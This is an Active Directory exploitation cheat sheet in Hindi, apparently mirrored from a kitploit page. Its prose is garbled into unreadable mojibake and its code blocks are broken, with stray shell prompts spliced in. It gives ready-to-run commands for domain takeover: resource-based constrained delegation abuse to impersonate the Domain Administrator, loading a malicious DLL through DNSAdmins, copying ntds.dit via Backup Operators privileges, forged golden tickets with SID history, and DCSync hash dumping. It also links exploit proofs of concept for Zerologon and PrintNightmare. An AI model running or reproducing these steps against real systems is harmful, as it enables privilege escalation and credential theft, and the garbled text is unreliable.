    рдЕрдм рд╣рдо рдкреНрд░рддрд┐рд░реВрдкрд┐рдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рд╕реЗрд╡рд╛ рддрдХ рдкрд╣реБрдБрдЪ рд╕рдХрддреЗ рд╣реИрдВ!
    
    :triangular_flag_on_post: **рдпрджрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдХреЗрд╡рд▓ рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ SPN (рдЬреИрд╕реЗ TIME) рдХреЗ рд▓рд┐рдП рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдЕрдзрд┐рдХрд╛рд░ рд╣реИрдВ рддреЛ рдХреНрдпрд╛ рд╣реЛрдЧрд╛:**
    
    рдЗрд╕ рд╕реНрдерд┐рддрд┐ рдореЗрдВ рд╣рдо рдЕрднреА рднреА рдХреЗрд░реНрдмреЗрд░реЛрд╕ рдХреА рдПрдХ рд╕реБрд╡рд┐рдзрд╛ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬрд┐рд╕реЗ "рд╡реИрдХрд▓реНрдкрд┐рдХ рд╕реЗрд╡рд╛" рдХрд╣рд╛ рдЬрд╛рддрд╛ рд╣реИред рдпрд╣ рд╣рдореЗрдВ рдХреЗрд╡рд▓ рдЙрд╕ рд╕реЗрд╡рд╛ рдХреЗ рд▓рд┐рдП рдирд╣реАрдВ, рдмрд▓реНрдХрд┐ рдЕрдиреНрдп "рд╡реИрдХрд▓реНрдкрд┐рдХ" рд╕реЗрд╡рд╛рдУрдВ рдХреЗ рд▓рд┐рдП TGS рдЯрд┐рдХрдЯ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ рдЬрд┐рд╕рдХреЗ рд▓рд┐рдП рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдЕрдзрд┐рдХрд╛рд░ рд╣реИрдВред рдпрд╣ рд╣рдореЗрдВ рд▓рдХреНрд╖реНрдп рдорд╢реАрди рдкрд░ рдкреВрд░реНрдг рдкрд╣реБрдБрдЪ рдкреНрд░рджрд╛рди рдХрд░рддреЗ рд╣реБрдП, рд╣реЛрд╕реНрдЯ рджреНрд╡рд╛рд░рд╛ рд╕рдорд░реНрдерд┐рдд рдХрд┐рд╕реА рднреА рд╕реЗрд╡рд╛ рдХреЗ рд▓рд┐рдП рд╡реИрдз рдЯрд┐рдХрдЯ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рдХреА рдХреНрд╖рдорддрд╛ рджреЗрддрд╛ рд╣реИред
    
    ### рд╕рдВрд╕рд╛рдзрди-рдЖрдзрд╛рд░рд┐рдд рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓
    
    _рдпрд╣ рдХреНрдпрд╛ рд╣реИ?: \
    TL;DR \
    рдпрджрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдбреЛрдореЗрди рдХреЗ рдХрд┐рд╕реА рдорд╢реАрди рдЦрд╛рддрд╛ рдСрдмреНрдЬреЗрдХреНрдЯ рдкрд░ GenericALL/GenericWrite рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реИрдВ, рддреЛ рд╣рдо рдЗрд╕рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЙрд╕ рдкрд░ рдбреЛрдореЗрди рдХреЗ рдХрд┐рд╕реА рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рд╕реНрд╡рдпрдВ рдХреЛ рдкреНрд░рддрд┐рд░реВрдкрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рд╣рдо рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХрд╛ рдкреНрд░рддрд┐рд░реВрдкрдг рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдкреВрд░реНрдг рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред_
    
    рд╣рдо рдЬрд┐рди рдЙрдкрдХрд░рдгреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдЬрд╛ рд░рд╣реЗ рд╣реИрдВ:
    
    - [PowerView](https://github.com/PowerShellMafia/PowerSploit/tree/dev/Recon)
    - [Powermad](https://github.com/Kevin-Robertson/Powermad)
    - [Rubeus](https://github.com/GhostPack/Rubeus)
    
    рдкрд╣рд▓реЗ рд╣рдореЗрдВ рдЙрд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛/рдорд╢реАрди рдЦрд╛рддреЗ рдХреЗ рд╕реБрд░рдХреНрд╖рд╛ рд╕рдВрджрд░реНрдн рдореЗрдВ рдкреНрд░рд╡реЗрд╢ рдХрд░рдирд╛ рд╣реЛрдЧрд╛ рдЬрд┐рд╕рдХреЗ рдкрд╛рд╕ рдСрдмреНрдЬреЗрдХреНрдЯ рдкрд░ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реИрдВред
    рдпрджрд┐ рдпрд╣ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддрд╛ рд╣реИ, рддреЛ рд╣рдо Pass the Hash, RDP, PSCredentials рдЖрджрд┐ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
    
    рд╢реЛрд╖рдг рдЙрджрд╛рд╣рд░рдг:```powershell
    #Import Powermad and use it to create a new MACHINE ACCOUNT
    . .\Powermad.ps1
    New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose
    
    #Import PowerView and get the SID of our new created machine account
    . .\PowerView.ps1
    $ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select -Expand objectsid
    
    #Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
    $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
    $SDBytes = New-Object byte[] ($SD.BinaryLength)
    $SD.GetBinaryForm($SDBytes, 0)
    
    #Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
    Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
    
    #After that we need to get the RC4 hash of the new machine account's password using Rubeus
    Rubeus.exe hash /password:'p@ssword!'
    
    #And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
    Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt
    
    #Finally we can access the C$ drive of the target machine
    dir \\TargetMachine.wtver.domain\C$
    

рд╡рд┐рд╕реНрддреГрдд рд▓реЗрдЦ:

  * Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory
  * RESOURCE-BASED CONSTRAINED DELEGATION ABUSE



тЭЧ рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдФрд░ рд╕рдВрд╕рд╛рдзрди-рдЖрдзрд╛рд░рд┐рдд рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдореЗрдВ, рдпрджрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ TRUSTED_TO_AUTH_FOR_DELEGATION рд╡рд╛рд▓реЗ рдЦрд╛рддреЗ рдХрд╛ рдкрд╛рд╕рд╡рд░реНрдб/рд╣реИрд╢ рдирд╣реАрдВ рд╣реИ рдЬрд┐рд╕рдХрд╛ рд╣рдо рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░ рд░рд╣реЗ рд╣реИрдВ, рддреЛ рд╣рдо kekeo рд╕реЗ "tgt::deleg" рдпрд╛ rubeus рд╕реЗ "tgtdeleg" рдирд╛рдордХ рдмрд╣реБрдд рдЕрдЪреНрдЫреА рдЯреНрд░рд┐рдХ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ Kerberos рдХреЛ рдзреЛрдЦрд╛ рджреЗ рд╕рдХрддреЗ рд╣реИрдВ рддрд╛рдХрд┐ рд╡рд╣ рд╣рдореЗрдВ рдЙрд╕ рдЦрд╛рддреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рд╡реИрдз TGT рджреЗ рд╕рдХреЗред рдлрд┐рд░ рд╣рдо рд╣рдорд▓реЗ рдХреЛ рдЕрдВрдЬрд╛рдо рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП рдЦрд╛рддреЗ рдХреЗ рд╣реИрд╢ рдХреЗ рдмрдЬрд╛рдп рдЯрд┐рдХрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред```powershell #Command on Rubeus Rubeus.exe tgtdeleg /nowrap

root@kitploit:~
    
    
    рд╡рд┐рд╕реНрддреГрдд рд▓реЗрдЦ:
    [Rubeus тАУ Now With More Kekeo](https://www.harmj0y.net/blog/redteaming/rubeus-now-with-more-kekeo/)
    
    ### DNSAdmins рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
    
    _рдпрд╣ рдХреНрдпрд╛ рд╣реИ?: рдпрджрд┐ рдХреЛрдИ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ DNSAdmins рд╕рдореВрд╣ рдХрд╛ рд╕рджрд╕реНрдп рд╣реИ, рддреЛ рд╡рд╣ рд╕рдВрднрд╡рддрдГ dns.exe рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдПрдХ рдордирдорд╛рдирд╛ DLL рд▓реЛрдб рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдЬреЛ SYSTEM рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд▓рддрд╛ рд╣реИред рдпрджрд┐ DC DNS рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ, рддреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдкрдиреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ DA рддрдХ рдмрдврд╝рд╛ рд╕рдХрддрд╛ рд╣реИред рдЗрд╕ рд╢реЛрд╖рдг рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рдХрд╛рдо рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП DNS рд╕реЗрд╡рд╛ рдХреЛ рдкреБрдирд░рд╛рд░рдВрдн рдХрд░рдиреЗ рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИред_
    
    1. DNSAdmins рд╕рдореВрд╣ рдХреЗ рд╕рджрд╕реНрдпреЛрдВ рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдВ:
       - PowerView: `Get-NetGroupMember -GroupName "DNSAdmins"`
       - AD Module: `Get-ADGroupMember -Identiny DNSAdmins`
    2. рдПрдХ рдмрд╛рд░ рдЬрдм рд╣рдореЗрдВ рдЗрд╕ рд╕рдореВрд╣ рдХрд╛ рдХреЛрдИ рд╕рджрд╕реНрдп рдорд┐рд▓ рдЬрд╛рддрд╛ рд╣реИ, рддреЛ рд╣рдореЗрдВ рдЙрд╕рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ (рдХрдИ рддрд░реАрдХреЗ рд╣реИрдВ)ред
    3. рдлрд┐рд░ SMB рд╢реЗрдпрд░ рдкрд░ рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг DLL рдкреНрд░рджрд╛рди рдХрд░рдХреЗ рдФрд░ dll рдХреЗ рдЙрдкрдпреЛрдЧ рдХреЛ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░рдХреЗ, рд╣рдо рдЕрдкрдиреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдмрдврд╝рд╛ рд╕рдХрддреЗ рд╣реИрдВ:   ```powershell
       #Using dnscmd:
       dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll
    
       #Restart the DNS Service:
       sc \\DNSServer stop dns
       sc \\DNSServer start dns
    

### рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛-рдПрдХреАрдХреГрдд DNS рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ

  * Exploiting Active Directory-Integrated DNS
  * ADIDNS Revisited
  * Inveigh



### рдмреИрдХрдЕрдк рдСрдкрд░реЗрдЯрд░реНрд╕ рд╕рдореВрд╣ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ

_рдпрд╣ рдХреНрдпрд╛ рд╣реИ?: рдпрджрд┐ рд╣рдо рдХрд┐рд╕реА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддреЗ рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд░рдиреЗ рдореЗрдВ рд╕рдлрд▓ рд╣реЛрддреЗ рд╣реИрдВ рдЬреЛ рдмреИрдХрдЕрдк рдСрдкрд░реЗрдЯрд░реНрд╕ рд╕рдореВрд╣ рдХрд╛ рд╕рджрд╕реНрдп рд╣реИ, рддреЛ рд╣рдо рдЗрд╕рдХреЗ SeBackupPrivilege рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдХреЗ DC рдХреА рд╡рд░реНрддрдорд╛рди рд╕реНрдерд┐рддрд┐ рдХреА рдПрдХ рдЫрд╛рдпрд╛ рдкреНрд░рддрд┐рд▓рд┐рдкрд┐ рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВ, ntds.dit рдбреЗрдЯрд╛рдмреЗрд╕ рдлрд╝рд╛рдЗрд▓ рдирд┐рдХрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВ, рд╣реИрд╢ рдбрдВрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЕрдкрдиреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ DA рддрдХ рдмрдврд╝рд╛ рд╕рдХрддреЗ рд╣реИрдВред_

  1. рдПрдХ рдмрд╛рд░ рдЬрдм рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдЙрд╕ рдЦрд╛рддреЗ рддрдХ рдкрд╣реБрдВрдЪ рд╣реЛ рдЬрд╛рддреА рд╣реИ рдЬрд┐рд╕рдХреЗ рдкрд╛рд╕ SeBackupPrivilege рд╣реИ, рддреЛ рд╣рдо DC рддрдХ рдкрд╣реБрдВрдЪ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рд╣рд╕реНрддрд╛рдХреНрд╖рд░рд┐рдд рдмрд╛рдЗрдирд░реА diskshadow рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рдЫрд╛рдпрд╛ рдкреНрд░рддрд┐рд▓рд┐рдкрд┐ рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВ: ```powershell #Create a .txt file that will contain the shadow copy process script Script ->{ set context persistent nowriters set metadata c:\windows\system32\spool\drivers\color\example.cab set verbose on begin backup add volume c: alias mydrive

create

expose %mydrive% w: end backup }

#Execute diskshadow with our script as parameter diskshadow /s script.txt

root@kitploit:~

  2. рдЕрдЧрд▓рд╛, рд╣рдореЗрдВ рд╢реИрдбреЛ рдХреЙрдкреА рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ SeBackupPrivilege рд╣реЛ рд╕рдХрддрд╛ рд╣реИ рд▓реЗрдХрд┐рди рд╣рдо рд╕реАрдзреЗ ntds.dit рдХреЛ рдХреЙрдкреА-рдкреЗрд╕реНрдЯ рдирд╣реАрдВ рдХрд░ рд╕рдХрддреЗ, рд╣рдореЗрдВ рдПрдХ рдмреИрдХрдЕрдк рд╕реЙрдлреНрдЯрд╡реЗрдпрд░ рдХреА рдирдХрд▓ рдХрд░рдиреА рд╣реЛрдЧреА рдФрд░ Win32 API рдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЗрд╕реЗ рдПрдХ рд╕реБрд▓рдн рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ рдХреЙрдкреА рдХрд░рдирд╛ рд╣реЛрдЧрд╛ред рдЗрд╕рдХреЗ рд▓рд┐рдП рд╣рдо рдпрд╣ рдЕрджреНрднреБрдд рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдЬрд╛ рд░рд╣реЗ рд╣реИрдВ: ```powershell #Importing both dlls from the repo using powershell Import-Module .\SeBackupPrivilegeCmdLets.dll Import-Module .\SeBackupPrivilegeUtils.dll

#Checking if the SeBackupPrivilege is enabled Get-SeBackupPrivilege

#If it isn't we enable it Set-SeBackupPrivilege

#Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:<PathToSave>\ntds.dit -Overwrite

#Dump the SYSTEM hive reg save HKLM\SYSTEM c:\temp\system.hive

root@kitploit:~

  3. smbclient.py рдХреЛ impacket рдпрд╛ рдХрд┐рд╕реА рдЕрдиреНрдп рдЯреВрд▓ рд╕реЗ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП рд╣рдо ntds.dit рдФрд░ SYSTEM рд╣рд╛рдЗрд╡ рдХреЛ рдЕрдкрдиреА рд▓реЛрдХрд▓ рдорд╢реАрди рдкрд░ рдХреЙрдкреА рдХрд░рддреЗ рд╣реИрдВред

  4. impacket рд╕реЗ secretsdump.py рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рдФрд░ рд╣реИрд╢ рдбрдВрдк рдХрд░реЗрдВред

  5. psexec рдпрд╛ рдЕрдкрдиреА рдкрд╕рдВрдж рдХреЗ рдХрд┐рд╕реА рдЕрдиреНрдп рдЯреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ, PTH рдХрд░реЗрдВ рдФрд░ рдбреЛрдореЗрди рдПрдбрдорд┐рди рдПрдХреНрд╕реЗрд╕ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред




### рдПрдХреНрд╕рдЪреЗрдВрдЬ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ

  * рдПрдХреНрд╕рдЪреЗрдВрдЬ рдХрд╛ рдбреАрдП рд╕реЗ рдПрдХ рдПрдкреАрдЖрдИ рдХреЙрд▓ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
  * CVE-2020-0688 \- рдлрд┐рдХреНрд╕реНрдб рдХреНрд░рд┐рдкреНрдЯреЛрдЧреНрд░рд╛рдлрд┐рдХ рдХреАрдЬрд╝ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдорд╛рдЗрдХреНрд░реЛрд╕реЙрдлреНрдЯ рдПрдХреНрд╕рдЪреЗрдВрдЬ рд╕рд░реНрд╡рд░ рдкрд░ рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди
  * PrivExchange рдПрдХреНрд╕рдЪреЗрдВрдЬ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЕрдкрдиреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдбреЛрдореЗрди рдПрдбрдорд┐рди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдореЗрдВ рдмрджрд▓реЗрдВ



### рдкреНрд░рд┐рдВрдЯрд░ рдмрдЧ рдХрд╛ рд╣рдерд┐рдпрд╛рд░реАрдХрд░рдг

  * рдкреНрд░рд┐рдВрдЯрд░ рд╕рд░реНрд╡рд░ рдмрдЧ рд╕реЗ рдбреЛрдореЗрди рдПрдбрдорд┐рдирд┐рд╕реНрдЯреНрд░реЗрдЯрд░ рддрдХ
  * NetNTLMtoSilverTicket



### ACLs рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ

  * рдПрдХреНрдЯрд┐рд╡ рдбрд╛рдпрд░реЗрдХреНрдЯреНрд░реА рдореЗрдВ ACLs рдХреЗ рд╕рд╛рде рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдмрдврд╝рд╛рдирд╛
  * aclpwn.py
  * Invoke-ACLPwn



### mitm6 рдХреЗ рд╕рд╛рде IPv6 рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ

  * IPv6 рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ IPv4 рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗ рд╕рдордЭреМрддрд╛
  * mitm6



### SID рд╣рд┐рд╕реНрдЯреНрд░реА рджреБрд░реБрдкрдпреЛрдЧ

_рдпрд╣ рдХреНрдпрд╛ рд╣реИ?: рдпрджрд┐ рд╣рдо рдХрд┐рд╕реА рдлреЙрд░реЗрд╕реНрдЯ рдХреЗ рдЪрд╛рдЗрд▓реНрдб рдбреЛрдореЗрди рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд░рдиреЗ рдореЗрдВ рд╕рдлрд▓ рд╣реЛрддреЗ рд╣реИрдВ рдФрд░SID рдлрд╝рд┐рд▓реНрдЯрд░рд┐рдВрдЧ рд╕рдХреНрд╖рдо рдирд╣реАрдВ рд╣реИ (рдЕрдзрд┐рдХрддрд░ рд╕рдордп рдРрд╕рд╛ рд╣реА рд╣реЛрддрд╛ рд╣реИ), рддреЛ рд╣рдо рдЗрд╕рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдХреЗ рдлреЙрд░реЗрд╕реНрдЯ рдХреЗ рд░реВрдЯ рдбреЛрдореЗрди рдХреЗ рдбреЛрдореЗрди рдПрдбрдорд┐рдирд┐рд╕реНрдЯреНрд░реЗрдЯрд░ рддрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛ рд╕рдХрддреЗ рд╣реИрдВред рдпрд╣ рдХреЗрд░реНрдмреЗрд░реЛрд╕ TGT рдЯрд┐рдХрдЯ рдкрд░ SID рд╣рд┐рд╕реНрдЯреНрд░реА рдлрд╝реАрд▓реНрдб рдХреЗ рдХрд╛рд░рдг рд╕рдВрднрд╡ рд╣реИ, рдЬреЛ "рдЕрддрд┐рд░рд┐рдХреНрдд" рд╕реБрд░рдХреНрд╖рд╛ рд╕рдореВрд╣реЛрдВ рдФрд░ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдкрд░рд┐рднрд╛рд╖рд┐рдд рдХрд░рддрд╛ рд╣реИред_

рд╢реЛрд╖рдг рдЙрджрд╛рд╣рд░рдг:```powershell #Get the SID of the Current Domain using PowerView Get-DomainSID -Domain current.root.domain.local

#Get the SID of the Root Domain using PowerView Get-DomainSID -Domain root.domain.local

#Create the Enteprise Admins SID Format: RootDomainSID-519

#Forge "Extra" Golden Ticket using mimikatz kerberos::golden /user:Administrator /domain:current.root.domain.local /sid: /krbtgt: /sids: /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi

#Inject the ticket into memory kerberos::ptt \path\to\ticket\golden.kirbi

#List the DC of the Root Domain dir \dc.root.domain.local\C$

#Or DCsync and dump the hashes using mimikatz lsadump::dcsync /domain:root.domain.local /all

root@kitploit:~
    
    
    рд╡рд┐рд╕реНрддреГрдд рд▓реЗрдЦ:
    
    - [Kerberos Golden Tickets are Now More Golden](https://adsecurity.org/?p=1640)
    - [A Guide to Attacking Domain Trusts](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
    
    ### SharePoint рдХрд╛ рд╢реЛрд╖рдг
    
    - [CVE-2019-0604](https://medium.com/@gorkemkaradeniz/sharepoint-cve-2019-0604-rce-exploitation-ab3056623b7d) RCE рд╢реЛрд╖рдг \
      [PoC](https://github.com/k8gege/CVE-2019-0604)
    - [CVE-2019-1257](https://www.zerodayinitiative.com/blog/2019/9/18/cve-2019-1257-code-execution-on-microsoft-sharepoint-through-bdc-deserialization) BDC рдбрд┐рд╕реАрд░рд┐рдпрд▓рд╛рдЗрдЬрд╝реЗрд╢рди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди
    - [CVE-2020-0932](https://www.zerodayinitiative.com/blog/2020/4/28/cve-2020-0932-remote-code-execution-on-microsoft-sharepoint-using-typeconverters) рдЯрд╛рдЗрдкрдХрдиреНрд╡рд░реНрдЯрд░реНрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ RCE \
      [PoC](https://github.com/thezdi/PoC/tree/master/CVE-2020-0932)
    
    ### Zerologon
    
    - [Zerologon: рдЕрд╕рддреНрдпрд╛рдкрд┐рдд рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░ рд╕рдордЭреМрддрд╛](https://www.secura.com/whitepapers/zerologon-whitepaper): рднреЗрджреНрдпрддрд╛ рдХрд╛ рд╡реНрд╣рд╛рдЗрдЯ рдкреЗрдкрд░ред
    - [SharpZeroLogon](https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon): Zerologon рд╢реЛрд╖рдг рдХрд╛ C# рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдиред
    - [Invoke-ZeroLogon](https://github.com/BC-SECURITY/Invoke-ZeroLogon): Zerologon рд╢реЛрд╖рдг рдХрд╛ PowerShell рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдиред
    - [Zer0Dump](https://github.com/bb00/zer0dump): impacket рд▓рд╛рдЗрдмреНрд░реЗрд░реА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ Zerologon рд╢реЛрд╖рдг рдХрд╛ Python рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдиред
    
    ### PrintNightmare
    
    - [CVE-2021-34527](https://vulners.com/cve/CVE-2021-34527): рднреЗрджреНрдпрддрд╛ рд╡рд┐рд╡рд░рдгред
    - [Impacket implementation of PrintNightmare](https://github.com/cube0x0/CVE-2021-1675): impacket рд▓рд╛рдЗрдмреНрд░реЗрд░реА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ PrintNightmare рдХрд╛ рд╡рд┐рд╢реНрд╡рд╕рдиреАрдп PoCред
    - [C# Implementation of CVE-2021-1675](https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare): C# рдореЗрдВ рд▓рд┐рдЦрд╛ рдЧрдпрд╛ PrintNightmare рдХрд╛ рд╡рд┐рд╢реНрд╡рд╕рдиреАрдп PoCред
    
    ### рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рд╕реЗрд╡рд╛рдПрдБ
    
    **рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдЯреЗрдореНрдкрд▓реЗрдЯреНрд╕ рдХреА рдЬрд╛рдБрдЪ рдХрд░реЗрдВ:** [Certify](https://github.com/GhostPack/Certify)
    
    _рдиреЛрдЯ: Certify рдХреЛ Cobalt Strike рдХреЗ `execute-assembly` рдХрдорд╛рдВрдб рдХреЗ рд╕рд╛рде рднреА рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ_```powershell
    .\Certify.exe find /vulnerable /quiet
    

